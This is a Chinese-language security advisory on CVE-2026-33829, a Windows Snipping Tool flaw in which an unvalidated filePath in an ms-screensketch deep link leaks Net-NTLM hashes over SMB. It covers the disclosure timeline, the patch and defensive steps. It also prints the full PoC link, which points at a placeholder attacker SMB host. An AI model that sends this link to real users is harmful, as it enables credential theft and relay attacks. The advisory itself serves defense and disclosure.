漏洞编号：CVE-2026-33829

漏洞类型：NTLM凭据哈希泄露

披露方：Black Arrow安全研究团队

近日，Windows自带截图工具（Snipping Tool）被披露存在安全漏洞（CVE-2026-33829），其概念验证（PoC）利用代码已同步公开。该漏洞根源在于工具对ms-screensketch协议深层链接处理存在缺陷，filePath参数未做有效输入校验，攻击者可构造恶意UNC路径触发漏洞。

该漏洞利用门槛极低，攻击者仅需诱导用户访问恶意URL或HTML页面即可发起攻击。受害者点击链接后，截图工具会正常启动，后台则会静默连接攻击者控制的SMB服务器，自动泄露Net-NTLM哈希——这些泄露的哈希可被离线破解或用于NTLM中继攻击，直接威胁企业内网安全。更值得警惕的是，攻击过程无明显异常，极易结合钓鱼社工手段实施，其PoC核心链接（技术参考）为：ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast。

针对该漏洞，微软已在2026年4月14日的Patch Tuesday安全更新中完成正式修复，其完整披露流程为：3月23日漏洞被上报至微软，4月14日微软同步发布补丁、公开漏洞细节及PoC利用代码。

为防范该漏洞带来的安全风险，相关防御建议如下：

• 立即安装安全补丁，彻底修复漏洞；

• 加强内网监控，重点排查异常出站SMB连接（端口445）；

• 在网络边界阻断出站SMB流量，做好兜底防护；

• 同时强化员工防钓鱼意识，警惕陌生链接及应用自动启动提示。

资讯来源：Black Arrow Security、微软2026年4月Patch Tuesday安全更新

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！